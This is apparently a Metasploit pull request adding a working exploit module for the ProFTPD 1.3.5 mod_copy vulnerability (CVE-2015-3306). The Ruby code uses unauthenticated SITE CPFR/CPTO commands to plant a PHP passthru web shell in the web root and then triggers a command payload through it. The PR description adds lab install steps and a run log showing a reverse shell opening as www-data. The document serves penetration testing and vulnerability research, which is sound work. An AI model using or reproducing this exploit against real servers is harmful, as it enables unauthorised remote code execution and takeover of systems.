### PR TITLE
Proftpd 1.3.5 Mod_Copy Command Execution

### DIFF
--- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
+++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
@@ -1,0 +1,147 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
+      'Description'    => %q{
+          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
+          Any unauthenticated client can leverage these commands to copy files from any
+          part of the filesystem to a chosen destination. The copy commands are executed with
+          the rights of the ProFTPD service, which by default runs under the privileges of the
+          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
+          directory, PHP remote code execution is made possible.
+      },
+      'Author'         =>
+        [
+          'Vadim Melihow', # Original discovery, Proof of Concept
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2015-3306'],
+          [ 'EDB', '36742' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => [ 'unix' ],
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'BadChars' => '',
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic gawk bash python perl',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'ProFTPD 1.3.5', { } ],
+        ],
+      'DisclosureDate' => 'Apr 22 2015',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'HTTP port', 80]),
+        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
+        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']),
+        OptString.new('TARGETURI', [true, 'Base path to the website', '/'])
+      ], self.class)
+  end
+
+  def check
+    ftp_port = datastore['RPORT_FTP']
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+
+    if sock.nil?
+      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+    else
+      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
+    end
+
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /220/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
+    end
+
+    sock.puts("SITE CPFR /etc/passwd\r\n")
+    res = sock.get_once(-1,10)
+    if res and res =~ /350/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    ftp_port = datastore['RPORT_FTP']
+    get_arg = rand_text_alphanumeric(5+rand(3))
+    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
+
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port })
+
+    if sock.nil?
+      fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
+    else
+      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
+    end
+
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /220/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
+    end
+
+    print_status("#{rhost}:21 - Sending copy commands to FTP server")
+
+    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /350/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
+    end
+
+    sock.put("SITE CPTO /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /250/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
+    end
+
+    sock.put("SITE CPFR /tmp/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /350/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
+    end
+
+    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
+    res = sock.get_once(-1,10)
+    unless ( res and res =~ /250/ )
+      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
+    end
+
+    sock.close
+
+    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, payload_name),
+      'method' => 'GET',
+      'vars_get' => { get_arg => "nohup #{payload.encoded} &" },
+    })
+
+    unless ( res and res.code == 200 )
+      fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload")
+    end
+
+  end
+end


### PR DESCRIPTION
This is the exploit for the CVE-2015-3306 - Proftpd 1.3.5 mod_copy vulnerability.
The vulnerability requires a Proftpd service with the mod_copy module enabled and a writable website directory to put our PHP payload in.

All testing has been done on a default Kali VM using the installation steps below

<h1>Proftpd installation steps</h1>

```
apt-get install build-essential
mkdir /apps
cd /root
wget "ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz"
tar zxfv proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --prefix=/apps/proftpd --with-modules=mod_copy
make
make install
cd /apps/proftpd/sbin
./proftpd
```

( If proftpd doesn't start, check that your hostname is correctly set in /etc/hosts )

```
/etc/init.d/apache2 start
chmod 777 /var/www
```

<h1>Exploit</h1>

```
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > set RHOST 192.168.2.112
RHOST => 192.168.2.112
msf exploit(proftpd_modcopy_exec) > exploit

[*] Started reverse handler on 192.168.2.130:4444
[*] 192.168.2.112:21 - Connected to FTP server
[*] 192.168.2.112:21 - Sending copy commands to FTP server
[*] 192.168.2.112:80 - Executing PHP payload /FbiRfY.php
[*] Command shell session 1 opened (192.168.2.130:4444 -> 192.168.2.112:59177) at 2015-04-22 01:27:52 -0400

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```